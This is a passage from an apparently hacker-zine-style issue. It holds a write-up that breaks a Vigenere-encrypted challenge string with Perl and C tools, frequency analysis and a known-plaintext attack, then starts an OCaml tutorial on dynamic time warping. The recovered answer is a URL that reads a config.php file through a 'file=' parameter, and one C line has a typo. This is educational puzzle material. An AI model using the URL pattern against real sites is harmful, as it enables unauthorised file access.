$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++
;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;

while($m[$p]){;$p--;};
$p++;$m[$p]--;
};

$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$p++;
$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$m[$p]++;
$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;
$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++;
$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$p++;
$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;
$p++;$p++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;
$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$p++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;
$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++;
$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;
$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;

while($m[$p]){;$p--;};
$p++;

# You may ask what that massive crap did.
# What it did was fill out a string of 62 characters
# This is the template of our phrase, the ciphertext


OVERLOAD or $m[$_] = $m[$_] % 256 for 0 .. $#m;
# Another normalization hack if you do not want to overload

# Our ciphertext is:
# 203 224 217 209 168 146 158 199 209 200 205 211 196 221 199 212 146 212 213
# 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204 213 162 210 206
# 205 211 160 157 147 199 149 153 201 198 219 210 158 199 212 209 210 206 200 156
# 211 215 212

# display();
# exit;

# Start at first char of phrase
# Current structure is:
# 0 password 0 j ciphertext

while($m[$p]){;
$p--;$p--;$m[$p]++; # counter++
# display() if $d < 5;$d++;
$p--;
while($m[$p]){
;$p--;
};
$p++; # Down to bottom (1)
while($m[$p]){
while($m[$p]){;
$p++;
};
$p--; # Counter right after password?
$m[$p]++; # ++
$p++;$p++;
$m[$p]--; # -- first char of phrase
$p--;$p--;
while($m[$p]){
$p--;
};
$p++;$m[$p]--;
# Back down to 1, subtract one
};
$p++;
while($m[$p]){
;$p++;
};

$p--; # Counter after password
$m[$p]--; # --
$p++;$p++; # First char
print chr $m[$p]; # print it
# print $m[$p], ' '; # print non-ascii values in debugging
$m[$p] = new Eightbit(0);
$p++; # next
};

};

__END__

1.3 Understanding

Ok, let me explain that.
First, here's how the total program works in Perl pseudocode

print "PW: ";
my $pass = <STDIN>;
if (hash($pass) != 128) {
destroy_data();
print "WRONG";
}
else {
my $ciphertext = ciphertext();
my $plaintext = decrypt($pass, $ciphertext);
print $plaintext;
}

We are provided with a ciphertext, we provide a password, and it decrypts it
according to the password. The block above takes the first character of the
password, subtracts that from the first character of the string, then
removes that character of the string and moves on to the next, and copies that
first character of password to the end of the password. So the password
rotates, such as:

abcdef -> bcdefa -> cdefab

And we keep going until we have exhausted the ciphertext

What is this? It's a Vigenere cipher! A Vigenere cipher is a series of shift
ciphers, so if you chose a password like "caesar", then the first character of
your ciphertext would be the sum of the first character of your plaintext and
'c'. The second character of the ciphertext is the second character of your
plaintext added with 'a'. When you run through the passphrase, you just start
at the beginning again. The ciphertext is the same length as the plaintext,
with a one-to-one character correspondence. The Vigenere cipher is a simple
stream cipher, and there are many weaknesses in it.

I conveniently have code to pwn those! See rattle's first crypto challenge at
http://www.awarenetwork.org//crypt0/vigenere/

Except, I don't think it will work. Maybe not.

Vigenere is easier to break the longer the text is, and the bigger the
text:password length ratios. We have a 61 character ciphertext. The password
better not be fucking 40 characters again. That would be unbreakable by
Kasiski or Z (hehe) methods



--[ 02 ]------------------------------------------------[ Wordlist Attack ]-----


Using a wordlist is a good place to start. About 1/256 of possible phrases will
work (because the hash result is stored as an eightbit value), so if you have
sizable wordlists then this is definitely worth a shot. First, trim your
wordlists down to size.

2.1 filter.c

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>

#define MAX_LEN 30

void transform(char*);
int valid_hash(const char*);
uint16_t line_length(const char*);
void usage();

int main(int argc, char **argv)
{
char buffer[MAX_LEN + 2];
FILE *in_fh, *out_fh;

if (argc < 3) usage();

if ( (in_fh = fopen(argv[1], "rb")) == NULL )
{
perror("Input file");
exit(EXIT_FAILURE);
}

if ( (out_fh = fopen(argv[2], "w")) == NULL )
{
perror("Output file");
exit(EXIT_FAILURE);
}

while ( fgets(buffer, MAX_LEN, in_fh) != NULL )
{
transform(buffer);
if ( valid_hash(buffer) )
{
if ( fputs(buffer, out_fh) == EOF )
{
puts("File printing error");
fclose(out_fh);
exit(EXIT_FAILURE);
}
}
}

fcloe(in_fh);
fclose(out_fh);

return(EXIT_SUCCESS);
}

void transform(char *buffer)
{
int32_t length = line_length(buffer);
buffer[length] = '\n';
buffer[length+1] = 0;
}

int valid_hash(const char* buffer)
{
if (!buffer) return 0;
uint8_t total = 0;

int32_t pos = line_length(buffer) - 1;
if (pos <= 0) return 0;

while ( pos >= 0 )
{
total += buffer[pos] * 2;
--pos;
if (pos < 0) break;
total -= buffer[pos];
--pos;
}
return total == 128;
}

uint16_t line_length(const char* buffer)
{
unsigned int pos = 0;
while ( buffer[pos] != '\n' && buffer[pos] != '\r'
&& buffer[pos] != 0 ) ++pos;
return pos;
}

void usage()
{
puts("./chall4 inputfile outputfile");
exit(EXIT_FAILURE);
}

2.2 Results

I used the above code to generate a wordlist. I basically put all of my
translated program into a subroutine and then did this:

while (my $word = <$fh>)
{
my $temp = compute($word);
$temp =~ /aware|mortal|rattle|penis/i and print "Success: $word";
$temp =~ /[Tt]he/ and print "Lesser success: $word";
}

A temporary variable is good because the actual computation is very expensive.
Twenty $m[$p]++ in a row is a series of operations, while $m[$p] += 20 would be
a little more atomic by Perl standards. Plus it's just a lot of stuff happening,
and all happening in Perl. Not to mention it's all happening on an overloaded
object.

Using C would be more efficient, but really was not worth it after I had my Perl
generated. Considering you end up with a shortened wordlist, this does not take
too long. Now if I was going to bruteforce, then I would want to lose Perl.

By the way, I do not chomp($word) before running it through compute(), because
the newline is needed at the end. That is also convenient for my output.

Unfortunately, I had no success. I lacked the necessary word or phrase.



--[ 03 ]--------------------------------------------------[ Cryptanalysis ]-----


The trick to beating a Vigenere cipher is to find the length of the password.
Once you have that, then you just have a series of Caesar ciphers. A Caesar
cipher is just a cipher where the alphabet has been shifted, such as rot13
encoding. To find out the shift, you just assume that the most common character
is a space (or an 'e', or whatever the appropriate character is) and then you've
found the shift. The Vigenere cipher is stronger than a simple Caesar cipher not
only because you have to find out the passphrase length, but also because it
gives you a series of smaller shift ciphers ( n / length(passphrase) ) to work
with.

To find the length, there is the traditional Kasiski method, and then there is
the method I used successfully last time.

3.1 Kasiski Method

The Kasiski method is to find repeated substrings. These suggest that the
password has overlapped the same plaintext at the same period in the password
rotation. This is very possible given common English words like "the" and such,
and is compounded by the shortness of the password. For reoccurances that are
not coincidences, the length between them will be some multiple of your
password length.

Imagine you have an 18 character password. Somehow your ciphertext has some term
repeated twice. The second time it happens, that *could* be with a completely
different plaintext, just with a different part of the password. Or it could be
the same plaintext, which only turns out to be the same ciphertext when that
plaintext is ciphered against the same part of the password.

Imagine the repeated string is 195 227 194 218 208. This might have happened
because of the following situation, where the password is 'blackhats'.

aware is aware.
blackhatsblackh

The string 'aware' perfectly overlaps with 'black' twice, creating the same
ciphertext in both occasions. As I said before, this could happen randomly,
with random plaintexts on different part of the password. The longer your
repeated string is, the less likely it's random. A lot of two-character
repetitions can be ignored, and probably should be if you have anything longer
to work with.

This tells us something. If we look at the difference in space between the two
repeated strings, we would see that they are nine characters apart. They are
nine characters apart because that is the length of the password, it's only at
nine (or eighteen or twenty-seven or other multiples of nine) that the password
repeats itself.

This is a fake example. In reality, if the term 'aware' is repeated enough and
you get one or more repetitions in your ciphertext, they could be quite apart.
They could be 72 characters apart, for example. If they were 72 characters
apart, then we could guess that the passphrase is 72 characters long, or 36,
or 24, or 18, or 12, or 9, 8, 6, 4, 3, 2, or 1 characters long. This one
repetition on its own gives us these options (72 has a lot of factors!). What
we do is analyze all large repetitions, aggregate the data, and see what fits.
If there was good repetition that was 81 characters away, we then narrow down
our possibilities to 9, 3, and 1.

Once we have our password length we just split the text into individual Caesar
ciphers and start to break them. We figure out what our likely most common
character is, perhaps space or 'e' or period, and then we use that to find the
shift amount in any given individual Caesar cipher.

However, there are a some issues that could render this ineffective in our
case, and ultimately running the Kasiski method against our ciphertext failed.

As you can see, very few single-character values repeat at all, let alone
multi-character strings! It's only a 61 character ciphertext!

# The count of any given ciphertext character
$VAR1 = {
'204' => 1,
'206' => 2,
'198' => 3,
'227' => 1,
'200' => 2,
'162' => 1,
'147' => 1,
'156' => 1,
'218' => 1,
'168' => 1,
'215' => 2,
'201' => 1,
'145' => 1,
'224' => 1,
'148' => 1,
'223' => 1,
'217' => 1,
'158' => 2,
'205' => 2,
'212' => 4,
'219' => 1,
'214' => 1,
'157' => 1,
'149' => 1,
'197' => 1,
'221' => 1,
'203' => 1,
'210' => 3,
'213' => 2,
'199' => 4,
'146' => 3,
'160' => 2,
'153' => 1,
'211' => 4,
'209' => 3,
'196' => 2,
'195' => 1
};

203 224 217 209 168 146 (158 199) 209 200 (205 211) 196 221 199 212 146
212 213 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204
213 162 (210 206) (205 211) 160 157 147 199 149 153 201 198 219 210 (158
199) 212 209 (210 206) 200 156 211 215 212

There are no long repeated substrings. Three two-character strings repeat
twice:

205 211 : 29 : (1) 29
210 206 : 18 : (1) 2 [3] 6 {9} 18
158 199 : 45 : (1) [3] 5 {9} 15 45

1, 3, and 9 are the best potential password lengths. But make no mistake,
these could be coincidences.

3.2 Z Method

What I do is take potential lengths (like 5-20), and find out how unbalanced the
character distribution would be if the password was that length. If it is the
wrong length, we will find the distribution balancing down. If it is the right
length, the common letters (like 'e') will be much more common in our resulting
plaintext.

The way I actually did this in the challenge was to generate the Caesar ciphers
for any given length. Then for each cipher, I just added the count of the most
common plaintext character. Add the counts from all the shift ciphers, and I get
a score for any given length. This is not the best way to incorporate all
information about distribution, but it worked. I also did not necessarily score
it in the most effective way, so I implemented a few methods.

If you guess the length right, you will find many duplicate characters. For
example, say we have individual Caesar ciphers with 80 items, after guessing the
right length. Maybe in a given one, 10 of those 80 chars are the same. That is,
they are the same because they are all supposed to be spaces, and since they are
all in the same shift cipher they have all been shifted by the same amount. It
does not really matter whether these characters are all spaces or 'e's or
anything in particular, what matters is how noticable they are.

On the other hand, if we had the wrong length, we'll just have a somewhat random
distribution. The ciphertext characters will not match up correctly with the
other ones that are shifted by the same amount, and our duplicates will be
distributed to different shift ciphers. This means that we will not have as many
duplicates in any given shift cipher, at least it is not as likely.

Here, from rattle's earlier Vigenere challenge, the distribution up to 50
characters.

Length: 1 |-| Sum: 253
Length: 2 |-| Sum: 278
Length: 3 |-| Sum: 256
Length: 4 |-| Sum: 288
Length: 5 |-| Sum: 343 <-- Jump!
Length: 6 |-| Sum: 283
Length: 7 |-| Sum: 270
Length: 8 |-| Sum: 369 <-- Jump!
Length: 9 |-| Sum: 261
Length: 10 |-| Sum: 483 <-- Massive jump!
Length: 11 |-| Sum: 273
Length: 12 |-| Sum: 300
Length: 13 |-| Sum: 279
Length: 14 |-| Sum: 295
Length: 15 |-| Sum: 360 <-- Jump
Length: 16 |-| Sum: 390
Length: 17 |-| Sum: 272
Length: 18 |-| Sum: 291
Length: 19 |-| Sum: 279
Length: 20 |-| Sum: 728 <-- Massive jump!
Length: 21 |-| Sum: 290
Length: 22 |-| Sum: 296
Length: 23 |-| Sum: 291
Length: 24 |-| Sum: 393 <-- Jump!
Length: 25 |-| Sum: 366
Length: 26 |-| Sum: 310
Length: 27 |-| Sum: 291
Length: 28 |-| Sum: 318
Length: 29 |-| Sum: 286
Length: 30 |-| Sum: 506 <-- Jump!
Length: 31 |-| Sum: 304
Length: 32 |-| Sum: 419
Length: 33 |-| Sum: 311
Length: 34 |-| Sum: 322
Length: 35 |-| Sum: 382
Length: 36 |-| Sum: 332
Length: 37 |-| Sum: 322
Length: 38 |-| Sum: 329
Length: 39 |-| Sum: 315
Length: 40 |-| Sum: 1209 <-- Super huge crazy massive jump!
Length: 41 |-| Sum: 313
Length: 42 |-| Sum: 336
Length: 43 |-| Sum: 322
Length: 44 |-| Sum: 362
Length: 45 |-| Sum: 400
Length: 46 |-| Sum: 346
Length: 47 |-| Sum: 339
Length: 48 |-| Sum: 442
Length: 49 |-| Sum: 329
Length: 50 |-| Sum: 532

The values get higher as you go (quite naturally) but we are looking for
big jumps. I pointed out some. As you can see, 40 characters is the winner
by far, and its factors of 20, 10, 8, and 5 had big jumps as well. The
jump gets bigger (both in change and proportion) the larger the factor.

So, here is the analysis for our small ciphertext:

Length: 1 |-| Sum: 4
Length: 2 |-| Sum: 7
Length: 3 |-| Sum: 6
Length: 4 |-| Sum: 9
Length: 5 |-| Sum: 10
Length: 6 |-| Sum: 10
Length: 7 |-| Sum: 11
Length: 8 |-| Sum: 13
Length: 9 |-| Sum: 15
Length: 10 |-| Sum: 12
Length: 11 |-| Sum: 14
Length: 12 |-| Sum: 15
Length: 13 |-| Sum: 14
Length: 14 |-| Sum: 14
Length: 15 |-| Sum: 18
Length: 16 |-| Sum: 19
Length: 17 |-| Sum: 20
Length: 18 |-| Sum: 22
Length: 19 |-| Sum: 23
Length: 20 |-| Sum: 21
Length: 21 |-| Sum: 23
Length: 22 |-| Sum: 24
Length: 23 |-| Sum: 25
Length: 24 |-| Sum: 26
Length: 25 |-| Sum: 25
Length: 26 |-| Sum: 26

The rest (up to 62) are all one or zero sum jumps.

Note that a 62-character password will never have its 62nd character used
against the 61-character ciphertext. It would be a one-time pad.

A 30 character passphrase would find every character used twice, which would
tell us nothing.

Part of me likes to imagine that rattle would give us a chance on this.
Something less than 30.

Well, what do we have? No massive peaks. The only jumps that even get out of
order at all are 2 and 9, with a respectable jump at 15.

So what can I say? Both methods concur for 9, but we really do not have much on
it. The reason they concur is not a coincidence, in this situation they are
almost measuring the same thing.

3.3 Analysis

Assuming a nine-character password:

Individual Caesar Ciphers
1 2 3 4 5 6 7 8 9
203 224 217 209 168 146 (158 199) 209
200 (205 211) 196 221 199 212 146 212
213 211 148 195 160 146 227 214 198
198 215 196 197 218 145 223 204 213
162 (210 206) (205 211) 160 157 147 199
149 153 201 198 219 210 (158 199) 212
209 (210 206) 200 156 211 215 212

Range of values:
64 62 69 14 65 66 70 68 15

Distance between smallest and next smallest:
13 52 48 01 04 01 01 01 01

Distance between highest and next highest:
04 14 06 04 02 01 04 02 01

Range of potential characters (Nothing smaller than 32 or higher than 122):
1 2 3 4 5 6 7 8 9
91-117 102-121 95-116 87-163 99-124 89-113 105-125 90-114 91-166

Good news! These ranges tell us that there could be some high uppercase
(W at worst), all the way up to two possible extremities (163,166). If we put
an upper limit of 126 on these, and get a range of 87-126, these 39 positions
include all 26 lowercase letters. What does this mean? It means we might be
looking at an entirely lowercase password. This is, of course, assuming that
rattle did not make use of the full eightbit space.

Could I be wrong? Absolutely. One or more of these could hold characters
smaller than 32, such as a newline.

There are also no overflowing results. Seems like mostly alphanumberic text
ciphered with an alphanumeric passphrase.

Columns six, seven, and eight all have low bottoms, and then values one higher
than that. What low consecutive ASCII characters could be used? Space and
exclamation mark?

One thing I was hoping for was for the last letter in the plaintext to be a
period. No such luck, or at least not with a nine-character passphrase.

The ciphertext is too short to contain multiple sentences, so there should not
be excessive punctuation. Just one sentence, so the low two characters in those
three columns might not be the exclamation mark and space. If they were dash
and period, we would get this:

1 2 3 4 5 6 7 8 9
203 224 217 209 168 . ( b ) 209
200 (205 211) 196 221 c d - 212
213 211 148 195 160 . r q 198
198 215 196 197 218 - o g 213
162 (210 206) (205 211) 2 - 199
149 153 201 198 219 n ( b ) 212
209 (210 206) 200 156 m g o

That looks blatantly wrong, as did a couple of other things I checked.

3.4 Alternative

Something I wanted to do, but ended up not doing, was to use a scoring system
and rank different potential passwords. I'd call it a z-score for ciphers, just
to mess with you. It has nothing to do with statistical z-scores.

The idea is that we measure the goodness of fit of a password. We create an
acceptable list of characters that we could expect in the plaintext, including
letters, numbers, punctuation, etc. Then we calculate the percentage of
resulting characters that are within that character set for a given password.
So if a password resulted in an entirely alphanumeric plaintext, the score
would be 100. Another password that gave us 59 alphanumeric characters out of
61 would have a score of 59/61 = 97.

The point is that we can rank potential passwords according to this score. Even
if we do not have the correct password at any point, if we get enough characters
right then that will be reflected in the score. Calculate the scores through a
wordlist or as you bruteforce, and watch the top. You have a good chance of
learning part of the password.



--[ 04 ]-----------------------------------------[ Known Plaintext Attack ]-----


4.1 Motivation

Originally I expected this to be a sentence, such as an IRC quote. I even
wondered if it could be the very sentence that was the passphrase last time. I
checked that. There are a few very different low-ASCII values, and having a
single sentence with limited punctuation just did not make sense.

Eventually it hit me: this could be a URL. If the plaintext started with "www",
we could figure this out trivially! It didn't, because then the fourth value
(209) would have to represent a period, and since 209 was the largest value in
that shift cipher, there would be six characters with lower ASCII values. Could
it start with "http://"? It just might! That looked like it made sense, except
possibly for that fourth character. Was 'p' likely to be the highest ASCII
character out of seven?

Since I had doubt, I really did not want to do all of it by hand. So I wrote
this script for decyphering a Vigenere cipher with some known plaintext and
known key length.

4.2 kpt.pl

#!/usr/bin/perl

use strict;
use warnings;

my @ciph = qw/
203 224 217 209 168 146 158 199 209
200 205 211 196 221 199 212 146 212
213 211 148 195 160 146 227 214 198
198 215 196 197 218 145 223 204 213
162 210 206 205 211 160 157 147 199
149 153 201 198 219 210 158 199 212
209 210 206 200 156 211 215 212
/;

my ($kpt, $len, $start) = @ARGV;

unless ( $len )
{
print "perl $0 known-plaintext len <start>\n";
exit -1;
}

($start ||= 0) <= $#ciph or die "pos out of range\n";

my @kpt = map ord, split '', $kpt;

# Default pass character
my @pass = ('*') x $len;

# Generate the password based on the known plaintext
for my $i ( 0 .. $#kpt )
{
$pass[($start + $i) % $len] = $ciph[$start + $i] - $kpt[$i];
}

# Print our guessed password
print "Estimated password: ";
for my $val ( @pass )
{
print $val eq '*' ? $val : chr $val;
}
print "\n";

# Print our plaintext
for my $i ( 0 .. $#ciph )
{
print $pass[$i % $len] ne '*'
? chr($ciph[$i] - $pass[$i % $len]) : '*', '';
$i % $len == $len - 1 and print "\n";
}
print "\n";


4.3 Results

zshzn@grapevine:~$ perl kpt.pl http:// 9
Estimated password: cleanco**
h t t p : / / * *
e a n c o d e * *
r g / b 2 / t * *
c k _ d l . p * *
? f i l e = . * *
2 - d e m o / * *
n f i g . p h *

There we have it, and the rest of the password is even in that plaintext:
cleancode.

The solution: http://cleancode.org/b2/track_dl.php?file=./b2-demo/config.php



--[ 06 ]----------------------------------------------------[ Conclusions ]-----


I certainly underestimated the known plaintext attack at the beginning. Not
only could I accurately guess part of the plaintext, I could have written
code to rotate a guessed string (like "php" for example) and find where an
estimated plaintext fit in.

One thing that would have made it that much more challenging would have been
base64 encoding. But as it was, it was a pretty diverse set of characters in
the plaintext. Sure wasn't a simple space-based sentence like traditional
examples. Any kind of unknown encoding before ciphering would have made this
much more difficult, especially anything that integrates across the plaintext.
Might as well not bother using a Vigenere cipher at all then.

There really is very added little security in using a Vigenere cipher. Sure it
took work, but I did eventually beat it. Password length, or more accurately
(ciphertext length / password length), is a crucial determinant of the security
level. A ratio of seven is much too high. If it was three, i.e. a twenty-
character passphrase, then knowing seven bytes would only have revealed a
third of the text, leaving much work to do. That's still horrible. Ultimately
a Vigenere cipher is only as useful as the degree to which it is a one-time
pad.

--------------------------------------------------------------------[ EOF ]-----


[==============================================================================]
[-----------------[ Dynamic programming with functional style ]----------------]
[==============================================================================]


_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<##### author: Teferi
################ date: 2008/08/08
*############*
"
T######T"



--[ 00 ]----------------------------------------------[ Table Of Contents ]-----

1. Introduction
2. Introducing: The algorithm
3. The naive approach
4. Digression 1: Untying the recursive knot
5. The untied approach
6. Digression 2: Y-Combinators
7. Re-introducing the caching
8. Getting rid of the imperative cache
9. Digression 3: Monads
10. Final solution
11. Conclusions and further perspectives



--[ 01 ]---------------------------------------------------[ Introduction ]-----


Today you are going to learn a fair bit of techniques that will aid you in
programming in functional languages. The way I will introduce these techniques
is by translating a imperative algorithm that uses the paradigm of dynamic
programming into a funtional algorithm.

This article is intended for people who are not yet functional programming
gurus, but like the prospect of learning some more helpful stuff. You should,
however, be familiar with the basics of this sort of programming. Also, some
basic knowledge of OCaml [1] might be helpful, since that will be the language
I will be using. This language makes it easier to cross the border from
an imperative setting to a functional one (yes, I will be cheating quite a bit
in doing that, but the final result will be purely functional).

As you probably know, the usual way of dynamic programming is solving small
subproblems and combining them, bottom up, into a larger subproblem - until
you are left with the final problem and a set of subsolutions to combine them
into an actual solution. Ok, this was really informal, I think we need to
have a deeper look at the principles at work here:
To be able to use dynamic programming you first need to identify something
called a "
principle of optimality" in literature [2]. In my lecture notes from
a few years ago there was an example what such a principle might look like:

OptSol(x1,...,xn) = Comb(OptSol(x1,...,x(n-1)),OptSol(x2,...,xn))

But do not be fooled by the general look of this formula, the "
principle of
optimality" might look quite different in other cases. Actually it will even
look different in the case we are going to discuss. All you have to remember
is that you need to be able to derive a optimal solution for a problem from
optimal solutions of the subproblems. For more on this, have a look at the
wikipedia entry on the Bellman Equation[3].

To find the optimal solution, we now need to partition our problem into
subproblems, solve these and combine them. Sounds a bit like "
Divide and
Conquer" doesn't it? Well, please don't try divide and conquer for
solving the subproblems, because for most cases they tend to overlap quite a
bit. A quick example for this:

fib(0) = 1
fib(1) = 1
fib(x) = fib(x-1)+fib(x-2)

This is the divide and conquer method. You can easily see that this creates
an overhead by calculating quite a bit of the Fibonacci sequence more than
once. If you do it this way, though:

fib(0) = 1
fib(1) = 1
for i = 2:n
fib(i) = fib(i-1) + fib(i-2)
end

then you are repeatedly caching the solutions, so you can access them again, in
case they overlap. We will go down the "
Divide and Conquer" again, when we want
to see how to do this in a functional setting. On the other hand, this will
only be a small side track, we hope to leave as soon as possible.



--[ 02 ]--------------------------------------------------[ The Algorithm ]-----


Ok, so now we need to decide on an Algorithm to twist around. Since I am mainly
working in the field of MIR (Music Information Retrieval) I'll propose dynamic
time working (DTW). Any objections to that? No? Ok then here it goes.

The goal of this algorithm is to find out how much it costs to align two
sequences of data. These sequences could be anything, in my case they usually
are feature sequences for musical pieces. Another really popular application
for this algorithm is gene sequences. Let's start out with a nice picture:
(editor's note: lol nice picture T)

Sequence 1: a a b c
|/ /| |
Sequence 2: a b b c

We have two pointers, one pointing into each of these sequences, starting at the
beginning. The cost of one step is measured by a metric on the feature space
(our a's, b's and c's in this case), representing the "
distance" between two
features. In each step we can go forward one step on either sequence alone or on
both of them. Now, when we sum up all the costs, what will be the minimum cost
we have to pay, to walk across the whole pair of sequences? In our example above,
if we assume the discrete metric, we do not have any costs at all. The way to
walk across them is hinted at by the bars. For more information I'll have to
redirect you to wikipedia again [4]. For more ideas on how to use this algorithm
I can point you to [5].

To compute the cost, we could of course calculate all possible action-sequences
and then find the optimal one, but that is a big no-no. Instead we have a closer
look at the problem: When we are at the end of both sequences with optimal
solutions for all states that lead to the end, and simply take the best one, we
obtain an optimal solution for the problem itself.

Hey, that sounds almost like a principle of optimality. More formally:

DTW(0,0) = dist(s1[0],s2[0])
DTW(a,b) = infinity; if a or b are smaller than zero
DTW(a,b) = dist(s1[a],s2[b]) + min {DTW(a-1,b-1), DTW(a ,b-1), DTW(a-1,b )}

Iterating over this gives us:

int DTWDistance(char s[1..n], char t[1..m], int d[1..n,1..m]) {
declare int DTW[0..n,0..m]
declare int i, j, cost

for i := 1 to m
DTW[0,i] := infinity
for i := 1 to n
DTW[i,0] := infinity
DTW[0,0] := 0

for i := 1 to n
for j := 1 to m
cost:= d[s[i],t[j]]
DTW[i,j] := minimum(DTW[i-1,j ] + cost, // insertion
DTW[i ,j-1] + cost, // deletion
DTW[i-1,j-1] + cost) // match

return DTW[n,m]
}

(Thanks to wikipedia for sparing me from having to write this)

However, this relies haviely on loops, and we want to be able to do it
functional style. So the next step is to discard this algorithm and start over
again.



--[ 03 ]---------------------------------------------[ The naive approach ]-----


We will at first do this very naively using "
divide and conquer". So we have our
first solution:

let rec dtw ?pos s1 s2 dist =
match pos with
None -> dtw ~pos:(Array.length s1-1,Array.length s2-1) s1 s2 dist
| Some (a,b) ->
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw ~pos:(a-1,b-1) s1 s2 dist ;
dtw ~pos:(a ,b-1) s1 s2 dist ;
dtw ~pos:(a-1,b ) s1 s2 dist ]
;;

Quite simple, isn't it? We transformed our equation into an algorithm. So now
we point this to our mp3 files and get busy with something else? Well, not
exactly. As I pointed out before, this algortihm is horribly inefficient, so
on long enough sequences of features it would terminate briefly before the
milky way implodes. We now have to find a way to introduce caching.

let rec dtw s1 s2 dist =
let cache = Hashtbl.create 10 in
let rec dtw' (a,b) =
try Hashtbl.find cache (a,b)
with Not_found ->
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw' (a-1,b-1);

dtw' (a ,b-1);
dtw' (a-1,b )]
in
dtw' (Array.length s1-1,Array.length s2-1)
;;

Yes, I admit, that is not as pretty as before, and it's even _cheating_, as we
are using an imperative Hashtable for caching. We are going to get rid of these
deficiencies soon, but first a little digression to a very useful technique.



--[ 04 ]-----------------------[ Digression 1: Untying the recursive knot ]-----


So what does it mean, when someone tells you to untie the recursive knot? It
means that there is a recursion hidden somewhere that we are going to get rid
of. Indeed, we are going to write some recursive definition without the use
of recursion. Theory proves that this can be done.
If you are not familiar with lambda-calculus, now is the time to have a look at
it: For example, check [7] or find a more entertaining introduction in [8].

As you might know, functional programming is loosely based on lambda-calculus.
In lambda-calculus we only have one type (let's call it F here) and this type
consists of functions from F to F... Somewhat like this:

type F = F -> F;;
(* No, this won't work in OCaml, unless you turn -rectypes on *)

